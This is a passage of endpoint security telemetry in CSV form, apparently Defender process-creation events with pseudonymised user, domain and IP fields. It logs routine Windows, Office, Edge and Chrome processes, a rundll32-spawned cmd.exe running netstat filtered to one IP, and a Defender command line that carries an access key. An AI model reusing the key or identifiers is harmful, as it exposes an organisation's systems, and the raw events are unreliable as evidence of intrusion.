Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+873,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:28:55.755231400+00:00,19256,NETSTAT.EXE,netstat  -ano ,PortableExecutable,2019-12-07 09:09:34.006180900+00:00,C:\Windows\System32\NETSTAT.EXE,39936,7fddd6681ea81ce26e64452336f479e6,b094e827af70241d71bed9767ec1a254fdc4164a646b2ba4c7105cd783adba0d,c038069021cea437ae40b421929e9d4d1a3440b3,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:28:55.682913100+00:00,11216,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""Ipv4PII_0767888fb5da2da2e8a81279ae5173ca4fe2a2b6""""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:28:55.836983500+00:00,2021-06-23 03:31:00.054408+00:00,23bf59b9-3668-4dcc-a8bd-3521fbb5775b,computerpii_0a470890c60768167990033d701e7bd881398861,161815,False,10.7740.19041.1052,False,11540474045173154,,11540474045173156,2021-06-23 03:28:55.682913100+00:00,11216,2021-06-23 03:28:55.682913100+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,11216,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,netstat.exe,netstat.exe,TCP/IP Netstat Command
+874,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:28:55.758990300+00:00,13420,find.exe,"find  ""Ipv4PII_0767888fb5da2da2e8a81279ae5173ca4fe2a2b6""",PortableExecutable,2019-12-07 09:09:37.707866+00:00,C:\Windows\System32\find.exe,17920,ae3f3dc3ed900f2a582bad86a764508c,1a1876c5eed2b8cd9e14ebff3f4eeb7e21552a4c6aab4bf392a55f8df3612dab,1e44ee63bdb2cf3a6e48b521844204218a001344,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:28:55.682913100+00:00,11216,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""Ipv4PII_0767888fb5da2da2e8a81279ae5173ca4fe2a2b6""""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:28:55.837140100+00:00,2021-06-23 03:31:00.054457600+00:00,7ba6c177-9c35-4268-80f6-da91f374933e,computerpii_0a470890c60768167990033d701e7bd881398861,161816,False,10.7740.19041.1052,False,11540474045173154,,11540474045173157,2021-06-23 03:28:55.682913100+00:00,11216,2021-06-23 03:28:55.682913100+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,11216,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,find,FIND.EXE,Find String (grep) Utility
+875,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:29:18.872268200+00:00,11872,HelpPane.exe,helppane.exe -Embedding,PortableExecutable,2021-04-14 01:10:31.130729300+00:00,C:\Windows\HelpPane.exe,1076736,86ae3be50df246c646da76e7223a968e,a1ad9018db52a951d7e80b998de7d6ee6b388d4aa1b46535e317662484186826,86618721f1a2c8a9c069a11213f4892ec446e3b5,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:29:18.902029700+00:00,2021-06-23 03:31:00.059066700+00:00,e20575fe-f506-460f-9562-5b24bfc3c334,computerpii_0a470890c60768167990033d701e7bd881398861,161830,False,10.7740.19041.1052,False,11540474045136908,,11540474045173164,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,HelpPane.exe,HelpPane.exe,Microsoft Help and Support
+876,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:29:19.095102300+00:00,17036,msedge.exe,"""msedge.exe"" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528884",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,86ae3be50df246c646da76e7223a968e,a1ad9018db52a951d7e80b998de7d6ee6b388d4aa1b46535e317662484186826,86618721f1a2c8a9c069a11213f4892ec446e3b5,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:29:18.872268200+00:00,11872,HelpPane.exe,helppane.exe -Embedding,False,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:29:19.112876800+00:00,2021-06-23 03:31:00.059299900+00:00,67dc8d53-dd99-4018-a068-36971a106cc6,computerpii_0a470890c60768167990033d701e7bd881398861,161834,False,10.7740.19041.1052,False,11540474045173164,,11540474045173165,2021-06-23 03:29:18.872268200+00:00,11872,2021-06-23 03:29:18.872268200+00:00,\Device\HarddiskVolume3\Windows\HelpPane.exe,11872,16512,ActiveProcessStartkey,C:\Windows,1076736,1996-03-08 23:12:23+00:00,2021-04-14 01:10:31.144286100+00:00,2021-06-23 03:29:18.885663200+00:00,2021-04-14 01:10:31.130729300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,128.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,HelpPane.exe,HelpPane.exe,Microsoft Help and Support,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+877,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:29:19.116644600+00:00,17772,msedge.exe,"""msedge.exe"" --type=crashpad-handler ""--user-data-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler ""--database=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data\Crashpad"" ""--metrics-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=91.0.4472.114 ""--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"" --annotation=plat=Win64 ""--annotation=prod=Microsoft Edge"" --annotation=ver=91.0.864.54 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffbde0806f8,0x7ffbde080708,0x7ffbde080718",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:29:19.095102300+00:00,17036,msedge.exe,"""msedge.exe"" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528884",False,2021-06-23 03:29:18.872268200+00:00,11872,\Device\HarddiskVolume3\Windows\HelpPane.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:29:19.127016400+00:00,2021-06-23 03:31:00.059351400+00:00,c54ce8db-a5df-4b4f-88de-a38c00068afa,computerpii_0a470890c60768167990033d701e7bd881398861,161835,False,10.7740.19041.1052,False,11540474045173165,,11540474045173166,2021-06-23 03:29:19.095102300+00:00,17036,2021-06-23 03:29:19.095102300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,17036,16512,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,16512,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,256.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+878,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:29:24.495981900+00:00,9072,WINWORD.EXE,"""WINWORD.EXE"" /n ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\IV candidate\FilePII_15549f01286c4669d09ccbbfee61348491099d84.docx"" /o """"",PortableExecutable,2021-06-12 08:57:29.821251600+00:00,C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE,1966872,f3abb50ecc7e899f33f65d25e85b41a9,66cfbd07dc44da187833715ddc6e1fed4facb8b8bdaf580017f9921f1a257a60,67d3ada9611ac933b40df52acde629cf800d3bad,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:29:24.904491200+00:00,2021-06-23 03:31:00.060359800+00:00,1123bd03-fd5c-46af-b3b1-26af0b6afe39,computerpii_0a470890c60768167990033d701e7bd881398861,161851,False,10.7740.19041.1052,False,11540474045171770,,11540474045173170,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,18560,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Office,16.0.13801.20738,WinWord,WinWord.exe,Microsoft Word
+879,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:59:34.155347300+00:00,10560,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320643_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320643 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:59:34.220207900+00:00,2021-06-23 02:01:47.185081900+00:00,d9b8cf30-0087-4e12-95e1-dc57452708f0,computerpii_0a470890c60768167990033d701e7bd881398861,159499,True,10.7740.19041.1052,False,11540474045144190,,11540474045172638,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+880,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:28:17.959559900+00:00,6768,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9776 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:28:18.334226+00:00,2021-06-24 03:29:51.716793100+00:00,704607b7-b45b-4f14-9941-d352f6c16c63,computerpii_0a470890c60768167990033d701e7bd881398861,174453,True,10.7740.19041.1052,False,11540474045175164,,11540474045176279,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+881,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:53:46.205374400+00:00,18368,FullTrustNotifier.exe,"""FullTrustNotifier.exe"" /InvokerPRAID: App",PortableExecutable,2020-11-11 08:07:19.023623400+00:00,C:\Program Files\WindowsApps\AcrobatNotificationClient_1.0.4.0_x86__e1rzdqpraam7r\FullTrustNotifier.exe,218632,3b48f5c06c41f721194a47784c60327e,e4572d5929da0ee07bf6c2de6361e247db96149dee5a6f3e7e61074c5b1dae62,d2960ac4d330d3964170aea37c62a147ba845f44,ba4cfe6461afa1004c52f19c8f2169dc,e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628,ab8539ef6b2a93ff9589dec4b34a0257b6296c92,S-1-12-1-3476864874-1154527411-4288707492-1560701320,domainpii_6c8dcea42fcdd51d2421333a881b2b98b372fa53,userpii_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 07:53:42.923035900+00:00,11724,RuntimeBroker.exe,RuntimeBroker.exe -Embedding,False,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:53:46.377825200+00:00,2021-06-24 07:54:37.664752800+00:00,172b694d-6a8d-4e71-80bb-7970d0ceb6ed,computerpii_0a470890c60768167990033d701e7bd881398861,177375,False,10.7740.19041.1052,False,11540474045177211,,11540474045177212,2021-06-24 07:53:42.923035900+00:00,11724,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,2176,Missing,c:\windows\system32\runtimebroker.exe,103288,2018-08-18 19:29:32+00:00,2021-02-17 04:34:50.958184300+00:00,2021-06-22 00:44:19.085614600+00:00,2021-02-17 04:34:50.954376500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,128.0,5.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RuntimeBroker.exe,RuntimeBroker.exe,Runtime Broker,,,,,,
+882,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 04:55:03.628906700+00:00,7640,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey D921F610-0E89-8BC8-2629-54607003F099 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 04:55:03.963917800+00:00,2021-06-24 04:56:13.895829300+00:00,188db666-b69a-4fa9-b801-369cabb387ef,computerpii_0a470890c60768167990033d701e7bd881398861,175880,False,10.7740.19041.1052,False,11540474045145394,,11540474045176705,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
